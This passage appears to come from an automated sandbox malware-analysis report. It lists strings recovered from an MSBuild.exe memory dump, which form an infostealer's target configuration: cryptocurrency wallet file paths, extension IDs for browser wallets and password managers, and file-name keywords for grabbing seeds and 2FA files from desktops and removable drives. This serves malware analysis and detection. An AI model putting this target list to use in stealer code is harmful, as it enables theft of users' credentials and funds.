Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MetaMask\|1\|nkbihfbeogaeaoehlefnkodbefgpgknn\|1\|0\|0\|MetaMask\|1\|djclckkglechooblngghdinmeemkbgci\|1\|0\|0\|MetaMask\|1\|ejbalbakoplchlghecdalmeeeajnimhm\|1\|0\|0\|TronLink\|1\|ibnejdfjmmkpcnlpebklmnkoeoihofec\|1\|0\|0\|BinanceChainWallet\|1\|fhbohimaelbohpjbbldcngcnapndodjp\|1\|1\|0\|Yoroi\|1\|ffnbelfdoeiohenkjibnmadjiehjhajb\|1\|0\|0\|Coinbase\|1\|hnfanknocfeofbddgcijnmhnfnkdnaad\|1\|0\|1\|Guarda\|1\|hpglfhgfnhbgpjdenjgmdgoeiappafln\|1\|0\|1\|iWallet\|1\|kncchdigobghenbbaddojjnnaogfppfj\|1\|0\|0\|RoninWallet\|1\|fnjhmkhhmkbjkkabndcnnogagogbneec\|1\|0\|0\|NeoLine\|1\|cphhlgmgameodnhkjdmkpanlelnlohao\|1\|0\|0\|CloverWallet\|1\|nhnkbkgjikgcigadomkphalanndcapjk\|1\|0\|0\|LiqualityWallet\|1\|kpfopkelmapcoipemfendmdcghnegimn\|1\|0\|0\|Terra_Station\|1\|aiifbnbfobpmeekipheeijimdpnlpgpp\|1\|0\|0\|Keplr\|1\|dmkamcknogkgcdfhhbddcghachkejeap\|1\|0\|0\|AuroWallet\|1\|cnmamaachppnkjgnildpdmkaakejnhae\|1\|0\|0\|PolymeshWallet\|1\|jojhfeoedkpkglbfimdfabpdfjaoolaf\|1\|0\|0\|ICONex\|1\|flpiciilemghbmfalicajoolhkkenfel\|1\|0\|0\|Coin98\|1\|aeachknmefphepccionboohckonoeemg\|1\|0\|0\|EVER Wallet\|1\|cgeeodpfagjceefieflmdfphplkenlfk\|1\|0\|0\|KardiaChain\|1\|pdadjkfkgcafgbceimcpbkalnfnepbnk\|1\|0\|0\|Rabby\|1\|acmacodkjbdgmoleebolmdjonilkdbch\|1\|0\|0\|Phantom\|1\|bfnaelmomeimhlpmgjnjophhpkkoljpa\|1\|0\|0\|Oxygen (Atomic)\|1\|fhilaheimglignddkjgofkcbgekhenbh\|1\|0\|0\|PaliWallet\|1\|mgffkfbidihjpoaomajlbgchddlicgpn\|1\|0\|0\|NamiWallet\|1\|lpfcbjknijpeeillifnkikgncikgfhdo\|1\|0\|0\|Solflare\|1\|bhhhlbepdkbapadjdnnojkbgioiodbic\|1\|0\|0\|CyanoWallet\|1\|dkdedlpgdmmkkfjabffeganieamfklkm\|1\|0\|0\|KHC\|1\|hcflpincpppdclinealmandijcmnkbgn\|1\|0\|0\|TezBox\|1\|mnfifefkajgofkcjkemidiaecocnkjeh\|1\|0\|0\|Goby\|1\|jnkelfanjkeadonecabehalmbgpfodjm\|1\|0\|0\|RoninWalletEdge\|1\|kjmoohlgokccodicjjfebfomlbljgfhk\|1\|0\|0\|UniSat Wallet\|1\|ppbibelpcjmhbdihakflkdcoccbgbkpo\|1\|0\|0\|Authenticator\|0\|bhghoamapcdpbohphigoooaddinpkbai\|1\|1\|0\|GAuth Authenticator\|0\|ilgcnhelpchnceeipipijaljkblbcobl\|1\|1\|1\|Tronium\|1\|pnndplcbkakcplkjnolgbkdgjikjednm\|1\|0\|0\|Trust Wallet\|1\|egjidjbpglichdcondbcbdnbeeppgdph\|1\|0\|0\|Exodus Web3 Wallet\|1\|aholpfdialjgjfhomihkjbmgjidlcdno\|1\|0\|0\|Braavos\|1\|jnlgamecbpmbajjfhmmmlhejkemejdma\|1\|0\|0\|Enkrypt\|1\|kkpllkodjeloidieedojogacfhpaihoh\|1\|0\|0\|OKX Web3 Wallet\|1\|mcohilncbfahbmgdjkbpemcciiolgcge\|1\|0\|0\|Sender\|1\|epapihdplajcdnnkdeiahlgigofloibg\|1\|0\|0\|Hashpack\|1\|gjagmgiddbbciopjhllkdnddhcglnemk\|1\|0\|0\|GeroWallet\|1\|bgpipimickeadkjlklgciifhnalhdjhe\|1\|0\|0\|Pontem Wallet\|1\|phkbamefinggmakgklpkljjmgibohnba\|1\|0\|0\|Finnie\|1\|cjmkndjhnagcfbpiemnkdpomccnjblmj\|1\|0\|0\|Leap Terra\|1\|aijcbedoijmgnlmjeegjaglmepbmpkpi\|1\|0\|0\|Microsoft AutoFill\|0\|fiedbfgcleddlbcmgdigjgdfcggjcion\|1\|0\|0\|Bitwarden\|0\|nngceckbapebfimnlniiiahkandclblb\|1\|0\|0\|KeePass Tusk\|0\|fmhmiaejopepamlcjkncpgpdjichnecm\|1\|0\|0\|KeePassXC-Browser\|0\|oboonakemofpalcgghocfoadofidjkkk\|1\|0\|0\|Rise - Aptos Wallet\|1\|hbbgbephgojikajhfbomhlmmollphcad\|1\|0\|0\|Rainbow Wallet\|1\|opfgelmcmbiajamepnmloijbpoleiama\|1\|0\|0\|Nightly\|1\|fiikommddbeccaoicoejoniammnalkfa\|1\|0\|0\|Ecto Wallet\|1\|bgjogpoidejdemgoochpnkmdjpocgkha\|1\|0\|0\|Coinhub\|1\|jgaaimajipbpdogpdglhaphldakikgef\|1\|0\|0\|Leap Cosmos Wallet\|1\|fcfcfllfndlomdhbehjjcoimbgofdncg\|1\|0\|0\|MultiversX DeFi Wal
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Flash\|%DRIVE_REMOVABLE%\\|wallet.,seed.,btc.,key.,2fa.,crypto.,coin.,private.,2fa.,auth.,ledger.,trezor.,pass.,wal.,upbit.,bcex.,bithimb.,hitbtc.,bitflyer.,kucoin.,huobi.,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|3\|windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,.mp3\|DESKTOP\|%DESKTOP%\\|wallet.,seed.,btc.,key.,2fa.,crypto.,coin.,private.,2fa.,auth.,ledger.,trezor.,pass.,wal.,upbit.,bcex.,bithimb.,hitbtc.,bitflyer.,kucoin.,huobi.,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|2\|Windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,.mp3\|
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet 